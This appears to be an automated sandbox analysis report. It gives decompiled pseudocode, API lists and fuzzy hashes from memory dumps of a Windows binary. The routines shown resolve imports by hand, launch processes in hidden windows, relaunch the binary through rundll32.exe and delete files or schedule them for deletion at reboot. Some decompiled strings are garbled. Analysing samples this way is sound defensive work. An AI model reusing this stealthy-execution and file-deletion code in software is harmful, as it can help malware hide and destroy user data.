                                                                                                                        				struct HINSTANCE__* _t35;
                                                                                                                        				signed int _t37;
                                                                                                                        				intOrPtr _t38;
                                                                                                                        				signed short _t39;
                                                                                                                        				CHAR* _t41;
                                                                                                                        				_Unknown_base(*)()* _t43;
                                                                                                                        				signed int _t45;
                                                                                                                        				signed int _t46;
                                                                                                                        				signed int _t47;
                                                                                                                        				signed int _t51;
                                                                                                                        				void* _t52;
                                                                                                                        				intOrPtr* _t57;
                                                                                                                        				signed short* _t59;
                                                                                                                        				intOrPtr _t65;
                                                                                                                        				intOrPtr* _t68;
                                                                                                                        				void* _t73;
                                                                                                                        				signed short* _t76;
                                                                                                                        				void* _t81;
                                                                                                                        				signed short _t103;
                                                                                                                        
                                                                                                                        				_t73 = __edi;
                                                                                                                        				_t34 = __eax;
                                                                                                                        				while(1) {
                                                                                                                        					_t57 = _a12;
                                                                                                                        					_t35 = LoadLibraryA( *((intOrPtr*)(_t73 + 0x144)) + _t34);
                                                                                                                        					_a16 = _t35;
                                                                                                                        					if(_t35 == 0) {
                                                                                                                        						break;
                                                                                                                        					}
                                                                                                                        					_t37 =  *(_t73 + 0x154);
                                                                                                                        					if( *(_t73 + 0x150) < _t37) {
                                                                                                                        						L13:
                                                                                                                        						if(_t81 != 0) {
                                                                                                                        							_t45 =  *(_t73 + 0x150);
                                                                                                                        							_t46 = _t45 + 1;
                                                                                                                        							 *(_t73 + 0x150) = _t46;
                                                                                                                        							if( *((intOrPtr*)(_t81 + _t45 * 4)) != 0) {
                                                                                                                        								 *((intOrPtr*)(_t81 + _t46 * 4)) = _a16;
                                                                                                                        								 *(_t73 + 0x150) =  *(_t73 + 0x150) + 1;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						_t38 =  *((intOrPtr*)(_t73 + 0x144));
                                                                                                                        						_t68 = _a12;
                                                                                                                        						_t76 =  *((intOrPtr*)(_t57 + 0x10)) + _t38;
                                                                                                                        						_t59 = _t76;
                                                                                                                        						if( *((intOrPtr*)(_t68 + 4)) == 0) {
                                                                                                                        							L19:
                                                                                                                        							_t39 =  *_t59;
                                                                                                                        							_t103 = _t39;
                                                                                                                        							if(_t103 == 0) {
                                                                                                                        								L26:
                                                                                                                        								_t34 =  *((intOrPtr*)(_t68 + 0x20));
                                                                                                                        								_a12 = _t68 + 0x14;
                                                                                                                        								if(_t34 != 0) {
                                                                                                                        									continue;
                                                                                                                        								} else {
                                                                                                                        									return 0;
                                                                                                                        								}
                                                                                                                        							} else {
                                                                                                                        								L20:
                                                                                                                        								if(_t103 >= 0) {
                                                                                                                        									_t41 = _t39 +  *((intOrPtr*)(_t73 + 0x144)) + 2;
                                                                                                                        								} else {
                                                                                                                        									_t41 = _t39 & 0x0000ffff;
                                                                                                                        								}
                                                                                                                        								_t43 = GetProcAddress(_a16, _t41);
                                                                                                                        								 *_t76 = _t43;
                                                                                                                        								if(_t43 == 0) {
                                                                                                                        									break;
                                                                                                                        								}
                                                                                                                        								_t39 = _t59[2];
                                                                                                                        								_t59 =  &(_t59[2]);
                                                                                                                        								_t76 =  &(_t76[2]);
                                                                                                                        								if(_t39 != 0) {
                                                                                                                        									goto L20;
                                                                                                                        								} else {
                                                                                                                        									_t68 = _a12;
                                                                                                                        									goto L26;
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        						} else {
                                                                                                                        							_t65 =  *_t68;
                                                                                                                        							if(_t65 == 0) {
                                                                                                                        								return 8;
                                                                                                                        							} else {
                                                                                                                        								_t59 = _t65 + _t38;
                                                                                                                        								goto L19;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        					} else {
                                                                                                                        						if(_t37 == 0) {
                                                                                                                        							_t47 = 0x10;
                                                                                                                        						} else {
                                                                                                                        							_t47 = _t37 + _t37;
                                                                                                                        						}
                                                                                                                        						 *(_t73 + 0x154) = _t47;
                                                                                                                        						_t81 = HeapAlloc(GetProcessHeap(), 8, _t47 * 4);
                                                                                                                        						if(_t81 == 0) {
                                                                                                                        							return 3;
                                                                                                                        						} else {
                                                                                                                        							_t51 =  *(_t73 + 0x150);
                                                                                                                        							if(_t51 != 0) {
                                                                                                                        								RtlMoveMemory(_t81,  *(_t73 + 0x14c), _t51 + _t51 + _t51 + _t51);
                                                                                                                        							}
                                                                                                                        							_t52 =  *(_t73 + 0x14c);
                                                                                                                        							if(_t52 != 0) {
                                                                                                                        								HeapFree(GetProcessHeap(), 0, _t52);
                                                                                                                        							}
                                                                                                                        							 *(_t73 + 0x14c) = _t81;
                                                                                                                        							goto L13;
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					L31:
                                                                                                                        				}
                                                                                                                        				return 6;
                                                                                                                        				goto L31;
                                                                                                                        			}

                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 6F33176D
                                                                                                                        • GetProcessHeap.KERNEL32(00000008), ref: 6F3317B0
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F3317B3
                                                                                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 6F3317DA
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 6F3317EC
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F3317EF
                                                                                                                        • GetProcAddress.KERNEL32(?,?), ref: 6F33185F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$AddressAllocFreeLibraryLoadMemoryMoveProc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2239585089-0
                                                                                                                        • Opcode ID: db9839d13b1418abeecf09bdf88284fc3d6eefcaade1963ca226438f7356772e
                                                                                                                        • Instruction ID: d48dca3991ae4241c46d5425f78c2810b2c10174371ae7538861a01c2598590e
                                                                                                                        • Opcode Fuzzy Hash: db9839d13b1418abeecf09bdf88284fc3d6eefcaade1963ca226438f7356772e
                                                                                                                        • Instruction Fuzzy Hash: E0315E76F007969BE704EF68D8447A6B7A9FF48355F048629E829CB301EB31F811CB90
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3_catch_GS.LIBCMT ref: 004F8524
                                                                                                                          • Part of subcall function 004B69A2: __EH_prolog3.LIBCMT ref: 004B69A9
                                                                                                                          • Part of subcall function 004ADA55: __EH_prolog3.LIBCMT ref: 004ADA60
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$H_prolog3_catch_
                                                                                                                        • String ID: Yu$ Yu$Validation of saved private key failed!$XYu$XYu
                                                                                                                        • API String ID: 2899319929-463955292
                                                                                                                        • Opcode ID: 141b135ca1fb09dd15b83df456b4f14438a2b17374786b570038f1be33776f45
                                                                                                                        • Instruction ID: 23615aed599726b50c28bfde34f034c51c69683924d87b2994db35aaa23e3029
                                                                                                                        • Opcode Fuzzy Hash: 141b135ca1fb09dd15b83df456b4f14438a2b17374786b570038f1be33776f45
                                                                                                                        • Instruction Fuzzy Hash: F321B774504148AADF14FF958956EAE7B75FF86314F01409DF252EB282CE381A09DB26
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 92%
                                                                                                                        			E6F334230(intOrPtr _a4, intOrPtr _a8, DWORD* _a12) {
                                                                                                                        				intOrPtr _v0;
                                                                                                                        				intOrPtr _v4;
                                                                                                                        				struct _SHELLEXECUTEINFOA _v68;
                                                                                                                        				intOrPtr _t22;
                                                                                                                        				intOrPtr _t23;
                                                                                                                        				intOrPtr _t24;
                                                                                                                        				int _t25;
                                                                                                                        				DWORD* _t27;
                                                                                                                        				int _t35;
                                                                                                                        				signed int _t38;
                                                                                                                        				long _t40;
                                                                                                                        
                                                                                                                        				_push(0x3c);
                                                                                                                        				_push( &(_v68.hwnd));
                                                                                                                        				L6F33C2EE();
                                                                                                                        				_t22 = _v0;
                                                                                                                        				_v68.cbSize = 0x3c;
                                                                                                                        				_v68.fMask = 0x800400;
                                                                                                                        				_v68.nShow = 0;
                                                                                                                        				if(_t22 != 0) {
                                                                                                                        					_v68.lpFile = _t22;
                                                                                                                        				}
                                                                                                                        				_t23 = _a4;
                                                                                                                        				if(_t23 != 0) {
                                                                                                                        					_v68.lpParameters = _t23;
                                                                                                                        				}
                                                                                                                        				_t24 = _v4;
                                                                                                                        				if(_t24 != 0) {
                                                                                                                        					_v68.lpVerb = _t24;
                                                                                                                        				}
                                                                                                                        				if(_a8 == 0) {
                                                                                                                        					_v68.fMask = 0x808400;
                                                                                                                        				} else {
                                                                                                                        					_v68.nShow = 1;
                                                                                                                        				}
                                                                                                                        				_t38 = _a12;
                                                                                                                        				if(_t38 != 0) {
                                                                                                                        					_v68.fMask = _v68.fMask | 0x00000040;
                                                                                                                        				}
                                                                                                                        				_t25 = ShellExecuteExA( &_v68);
                                                                                                                        				_t35 = _t25;
                                                                                                                        				if(_t35 != 0 && _t38 != 0) {
                                                                                                                        					if(_t38 == 0xffffffff) {
                                                                                                                        						_t40 = _t38 | 0xffffffff;
                                                                                                                        					} else {
                                                                                                                        						_t40 = _t38 * 0x3e8;
                                                                                                                        					}
                                                                                                                        					WaitForSingleObject(_v68.hIcon, _t40);
                                                                                                                        					_t27 = _a12;
                                                                                                                        					if(_t27 != 0) {
                                                                                                                        						GetExitCodeProcess(_v68.hIcon, _t27);
                                                                                                                        					}
                                                                                                                        					CloseHandle(_v68.hIcon);
                                                                                                                        					_t25 = _t35;
                                                                                                                        				}
                                                                                                                        				return _t25;
                                                                                                                        			}















                                                                                                                        APIs
                                                                                                                        • RtlZeroMemory.NTDLL(0000003C,0000003C), ref: 6F33423A
                                                                                                                        • ShellExecuteExA.SHELL32(0000003C,00000000,00000000), ref: 6F3342A7
                                                                                                                        • WaitForSingleObject.KERNEL32(?,?), ref: 6F3342CD
                                                                                                                        • GetExitCodeProcess.KERNEL32 ref: 6F3342E1
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 6F3342EC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCodeExecuteExitHandleMemoryObjectProcessShellSingleWaitZero
                                                                                                                        • String ID: @
                                                                                                                        • API String ID: 1639083440-2766056989
                                                                                                                        • Opcode ID: 93814b0b1793294fe0fe26721a22d68b433e192926ed57a498fa880293b5a424
                                                                                                                        • Instruction ID: 9fd273de62ff93ce936e8f54bf83aa43079eeafee47608e2d9efb4b00d4676af
                                                                                                                        • Opcode Fuzzy Hash: 93814b0b1793294fe0fe26721a22d68b433e192926ed57a498fa880293b5a424
                                                                                                                        • Instruction Fuzzy Hash: AC216F729097A19BD710CF69C544B5BBBE8BB89710F008A1EF9A4E3280D777D804CF52
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 70%
                                                                                                                        			E6F335190(intOrPtr _a4) {
                                                                                                                        				char _v772;
                                                                                                                        				char _v780;
                                                                                                                        				void* _t4;
                                                                                                                        				char* _t5;
                                                                                                                        				char _t6;
                                                                                                                        				intOrPtr _t11;
                                                                                                                        				CHAR* _t14;
                                                                                                                        
                                                                                                                        				_t11 = _a4;
                                                                                                                        				if(_t11 != 0x65 ||  *0x6f34027c >= 6 && M6F340544 == 0 && M6F340548 != 0) {
                                                                                                                        					_t4 = OpenEventA(2, 0, "TVRF_Instance");
                                                                                                                        					if(_t4 == 0) {
                                                                                                                        						_t5 = M6F340530; // 0xa32c28
                                                                                                                        						_t14 = M6F340524; // 0xa56118
                                                                                                                        						_t6 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa4de08
                                                                                                                        						wsprintfA( &_v780, "\"%s%s\" \"%s\",#%d %c \"%s\"", _t6, "rundll32.exe", _t14, 0x195, _t11, _t5);
                                                                                                                        						_push(0);
                                                                                                                        						_push(0);
                                                                                                                        						_push(0);
                                                                                                                        						_push(0);
                                                                                                                        						return E6F334EF0( &_v772, 1, 0);
                                                                                                                        					} else {
                                                                                                                        						CloseHandle(_t4);
                                                                                                                        						goto L6;
                                                                                                                        					}
                                                                                                                        				} else {
                                                                                                                        					L6:
                                                                                                                        					return 0;
                                                                                                                        				}
                                                                                                                        			}











                                                                                                                        APIs
                                                                                                                        • OpenEventA.KERNEL32(00000002,00000000,TVRF_Instance,?), ref: 6F3351C7
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 6F3351D2
                                                                                                                        • wsprintfA.USER32 ref: 6F33520D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseEventHandleOpenwsprintf
                                                                                                                        • String ID: "%s%s" "%s",#%d %c "%s"$TVRF_Instance$rundll32.exe
                                                                                                                        • API String ID: 3063877008-2939335533
                                                                                                                        • Opcode ID: b045e211195f4a2e71a1049b1ed422b6b787e831a5b37690626b1419245d3e0c
                                                                                                                        • Instruction ID: 6cbb97e43f4a80142bbc268f1e261c37de654f333b52529154985c0ec639c8af
                                                                                                                        • Opcode Fuzzy Hash: b045e211195f4a2e71a1049b1ed422b6b787e831a5b37690626b1419245d3e0c
                                                                                                                        • Instruction Fuzzy Hash: 1601F2B2E94791ABEF60E724CC55BA237AEE755725F40120CF824851D0E679A168CB22
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F332E59(struct _WIN32_FIND_DATAA _a16, char _a60, char _a336, char _a344) {
                                                                                                                        				signed char _t9;
                                                                                                                        				CHAR* _t16;
                                                                                                                        				void* _t18;
                                                                                                                        				void* _t23;
                                                                                                                        				void* _t28;
                                                                                                                        
                                                                                                                        				do {
                                                                                                                        					_t9 = _a16.dwFileAttributes;
                                                                                                                        					if((_t9 & 0x00000010) == 0 && _t9 != 0) {
                                                                                                                        						wsprintfA( &_a336, "%s%s", _t18,  &_a60);
                                                                                                                        						_t28 = _t28 + 0x10;
                                                                                                                        						_t16 = DeleteFileA( &_a344);
                                                                                                                        						if(_t16 == 0) {
                                                                                                                        							MoveFileExA( &_a344, _t16, 4);
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        				} while (FindNextFileA(_t23,  &_a16) != 0);
                                                                                                                        				FindClose(_t23);
                                                                                                                        				return 1;
                                                                                                                        			}









                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Find$CloseDeleteMoveNextwsprintf
                                                                                                                        • String ID: %s%s
                                                                                                                        • API String ID: 2350977733-3252725368
                                                                                                                        • Opcode ID: 0a064f2c1c9305de79f711fe0e148262895fa60d3bf8f0f154ac57577debe10b
                                                                                                                        • Instruction ID: a3a286cadaac2dc96a2b7dabb0799e1fb389ab9fab46922d5442e8941c6f4190
                                                                                                                        • Opcode Fuzzy Hash: 0a064f2c1c9305de79f711fe0e148262895fa60d3bf8f0f154ac57577debe10b
                                                                                                                        • Instruction Fuzzy Hash: 1BF04F73A04395ABD760DAA4CC49FEB73ADEF85721F40081DF994D6200EB76E1149692
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 38%
                                                                                                                        			E6F334A20() {
                                                                                                                        				char _v4;
                                                                                                                        				char _v12;
                                                                                                                        				char _v16;
                                                                                                                        				intOrPtr _v32;
                                                                                                                        				intOrPtr* _v36;
                                                                                                                        				char _v40;
                                                                                                                        				char _v44;
                                                                                                                        				intOrPtr* _v48;
                                                                                                                        				char _v52;
                                                                                                                        				intOrPtr* _v56;
                                                                                                                        				intOrPtr* _v60;
                                                                                                                        				intOrPtr _v64;
                                                                                                                        				intOrPtr* _v68;
                                                                                                                        				char _v72;
                                                                                                                        				intOrPtr* _v76;
                                                                                                                        				char _v80;
                                                                                                                        				intOrPtr* _v84;
                                                                                                                        				char _v88;
                                                                                                                        				intOrPtr* _v100;
                                                                                                                        				char _v104;
                                                                                                                        				intOrPtr* _v108;
                                                                                                                        				intOrPtr* _v124;
                                                                                                                        				intOrPtr _v128;
                                                                                                                        				intOrPtr* _v132;
                                                                                                                        				intOrPtr* _v136;
                                                                                                                        				intOrPtr _v140;
                                                                                                                        				intOrPtr* _v148;
                                                                                                                        				intOrPtr* _t67;
                                                                                                                        				intOrPtr* _t70;
                                                                                                                        				intOrPtr* _t73;
                                                                                                                        				intOrPtr* _t76;
                                                                                                                        				intOrPtr* _t78;
                                                                                                                        				intOrPtr* _t81;
                                                                                                                        				intOrPtr* _t84;
                                                                                                                        				intOrPtr* _t87;
                                                                                                                        				intOrPtr* _t89;
                                                                                                                        				intOrPtr* _t94;
                                                                                                                        				intOrPtr* _t97;
                                                                                                                        				intOrPtr* _t99;
                                                                                                                        				intOrPtr* _t102;
                                                                                                                        				intOrPtr* _t104;
                                                                                                                        				intOrPtr* _t106;
                                                                                                                        				intOrPtr* _t108;
                                                                                                                        				intOrPtr* _t111;
                                                                                                                        				void* _t150;
                                                                                                                        				void* _t151;
                                                                                                                        				void* _t153;
                                                                                                                        				intOrPtr* _t154;
                                                                                                                        				void* _t156;
                                                                                                                        				intOrPtr _t157;
                                                                                                                        				intOrPtr* _t158;
                                                                                                                        
                                                                                                                        				_t158 = __imp__CoCreateInstance;
                                                                                                                        				_push( &_v16);
                                                                                                                        				_push(0x6f33e08c);
                                                                                                                        				_push(1);
                                                                                                                        				_push(0);
                                                                                                                        				_push(0x6f33e0cc);
                                                                                                                        				_v12 = 0;
                                                                                                                        				_v4 = 0;
                                                                                                                        				_v16 = 0;
                                                                                                                        				if( *_t158() < 0) {
                                                                                                                        					L26:
                                                                                                                        					return _v32;
                                                                                                                        				}
                                                                                                                        				_t67 = _v36;
                                                                                                                        				_v40 = 0;
                                                                                                                        				_push( &_v40);
                                                                                                                        				_push(_t67);
                                                                                                                        				if( *((intOrPtr*)( *((intOrPtr*)( *_t67 + 0x1c))))() < 0) {
                                                                                                                        					L25:
                                                                                                                        					_t70 = _v44;
                                                                                                                        					 *((intOrPtr*)( *((intOrPtr*)( *_t70 + 8))))(_t70);
                                                                                                                        					if(_v36 != 0) {
                                                                                                                        						return 1;
                                                                                                                        					}
                                                                                                                        					goto L26;
                                                                                                                        				}
                                                                                                                        				_t73 = _v48;
                                                                                                                        				_v52 = 0;
                                                                                                                        				_push( &_v52);
                                                                                                                        				_push(_t73);
                                                                                                                        				if( *((intOrPtr*)( *((intOrPtr*)( *_t73 + 0x1c))))() < 0) {
                                                                                                                        					L24:
                                                                                                                        					_t76 = _v56;
                                                                                                                        					 *((intOrPtr*)( *((intOrPtr*)( *_t76 + 8))))(_t76);
                                                                                                                        					goto L25;
                                                                                                                        				} else {
                                                                                                                        					_t78 = _v60;
                                                                                                                        					_v44 = 0;
                                                                                                                        					_push( &_v44);
                                                                                                                        					_push(_t78);
                                                                                                                        					if( *((intOrPtr*)( *((intOrPtr*)( *_t78 + 0x20))))() >= 0 && _v52 != 0) {
                                                                                                                        						_v48 = 1;
                                                                                                                        					}
                                                                                                                        					_t81 = _v68;
                                                                                                                        					_v72 = 0;
                                                                                                                        					_push( &_v72);
                                                                                                                        					_push(_t81);
                                                                                                                        					if( *((intOrPtr*)( *((intOrPtr*)( *_t81 + 0x50))))() < 0) {
                                                                                                                        						L23:
                                                                                                                        						_t84 = _v76;
                                                                                                                        						 *((intOrPtr*)( *((intOrPtr*)( *_t84 + 8))))(_t84);
                                                                                                                        						goto L24;
                                                                                                                        					}
                                                                                                                        					_t154 = __imp__#2;
                                                                                                                        					_t151 =  *_t154(_v44, _t150, _t153);
                                                                                                                        					if(_t151 == 0) {
                                                                                                                        						L22:
                                                                                                                        						_t87 = _v84;
                                                                                                                        						 *((intOrPtr*)( *((intOrPtr*)( *_t87 + 8))))(_t87);
                                                                                                                        						goto L23;
                                                                                                                        					}
                                                                                                                        					_t89 = _v84;
                                                                                                                        					_push( &_v88);
                                                                                                                        					_v88 = 0;
                                                                                                                        					_push(_t151);
                                                                                                                        					_push(_t89);
                                                                                                                        					if( *((intOrPtr*)( *((intOrPtr*)( *_t89 + 0x28))))() < 0) {
                                                                                                                        						if(_v64 != 0) {
                                                                                                                        							_t156 =  *_t154(_v56);
                                                                                                                        							if(_t156 != 0) {
                                                                                                                        								_push( &_v104);
                                                                                                                        								_push(0x6f33e05c);
                                                                                                                        								_push(1);
                                                                                                                        								_push(0);
                                                                                                                        								_push(0x6f33e0ac);
                                                                                                                        								if( *_t158() >= 0) {
                                                                                                                        									_t94 = _v124;
                                                                                                                        									 *((intOrPtr*)( *((intOrPtr*)( *_t94 + 0x28))))(_t94, _t151);
                                                                                                                        									_t97 = _v132;
                                                                                                                        									 *((intOrPtr*)( *((intOrPtr*)( *_t97 + 0x20))))(_t97, _t156);
                                                                                                                        									_t99 = _v136;
                                                                                                                        									_push(_v140);
                                                                                                                        									_push(_t99);
                                                                                                                        									if( *((intOrPtr*)( *((intOrPtr*)( *_t99 + 0x20))))() >= 0) {
                                                                                                                        										_v128 = 1;
                                                                                                                        									}
                                                                                                                        									_t102 = _v148;
                                                                                                                        									 *((intOrPtr*)( *((intOrPtr*)( *_t102 + 8))))(_t102);
                                                                                                                        								}
                                                                                                                        								__imp__#6(_t156);
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						L21:
                                                                                                                        						__imp__#6(_t151);
                                                                                                                        						goto L22;
                                                                                                                        					}
                                                                                                                        					_t157 = _v52;
                                                                                                                        					if(_t157 == 0) {
                                                                                                                        						_t108 = _v100;
                                                                                                                        						_v80 = 0;
                                                                                                                        						 *((intOrPtr*)( *((intOrPtr*)( *_t108 + 0x44))))(_t108,  &_v80);
                                                                                                                        						if(_v88 == 0) {
                                                                                                                        							_t111 = _v108;
                                                                                                                        							 *((intOrPtr*)( *((intOrPtr*)( *_t111 + 0x48))))(_t111, 0xffffffff);
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					_t104 = _v100;
                                                                                                                        					_v80 = 1;
                                                                                                                        					 *((intOrPtr*)( *((intOrPtr*)( *_t104 + 8))))(_t104);
                                                                                                                        					if(_t157 != 0) {
                                                                                                                        						_t106 = _v100;
                                                                                                                        						 *((intOrPtr*)( *((intOrPtr*)( *_t106 + 0x24))))(_t106, _t151);
                                                                                                                        					}
                                                                                                                        					goto L21;
                                                                                                                        				}
                                                                                                                        			}






















































                                                                                                                        0x6f334b7b
                                                                                                                        0x6f334b7c
                                                                                                                        0x6f334b81
                                                                                                                        0x6f334b83
                                                                                                                        0x6f334b84
                                                                                                                        0x6f334b8d
                                                                                                                        0x6f334b8f
                                                                                                                        0x6f334b9a
                                                                                                                        0x6f334b9c
                                                                                                                        0x6f334ba7
                                                                                                                        0x6f334ba9
                                                                                                                        0x6f334bb3
                                                                                                                        0x6f334bb4
                                                                                                                        0x6f334bbc
                                                                                                                        0x6f334bbe
                                                                                                                        0x6f334bbe
                                                                                                                        0x6f334bc6
                                                                                                                        0x6f334bd0
                                                                                                                        0x6f334bd0
                                                                                                                        0x6f334bd3
                                                                                                                        0x6f334bd3
                                                                                                                        0x6f334b75
                                                                                                                        0x6f334bd9
                                                                                                                        0x6f334bda
                                                                                                                        0x00000000
                                                                                                                        0x6f334bda
                                                                                                                        0x6f334b07
                                                                                                                        0x6f334b0d
                                                                                                                        0x6f334b0f
                                                                                                                        0x6f334b17
                                                                                                                        0x6f334b22
                                                                                                                        0x6f334b29
                                                                                                                        0x6f334b2b
                                                                                                                        0x6f334b37
                                                                                                                        0x6f334b37
                                                                                                                        0x6f334b29
                                                                                                                        0x6f334b39
                                                                                                                        0x6f334b43
                                                                                                                        0x6f334b4b
                                                                                                                        0x6f334b4f
                                                                                                                        0x6f334b55
                                                                                                                        0x6f334b60
                                                                                                                        0x6f334b60
                                                                                                                        0x00000000
                                                                                                                        0x6f334b4f

                                                                                                                        APIs
                                                                                                                        • CoCreateInstance.OLE32(6F33E0CC,00000000,00000001,6F33E08C,?,00000000,?,?,?,?,6F334C6B,?,?,?,00000001), ref: 6F334A4B
                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 6F334AE1
                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 6F334B6F
                                                                                                                        • CoCreateInstance.OLE32(6F33E0AC,00000000,00000001,6F33E05C,?,?,?,?,6F334C6B,?,?,?,00000001), ref: 6F334B89
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 6F334BD3
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 6F334BDA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
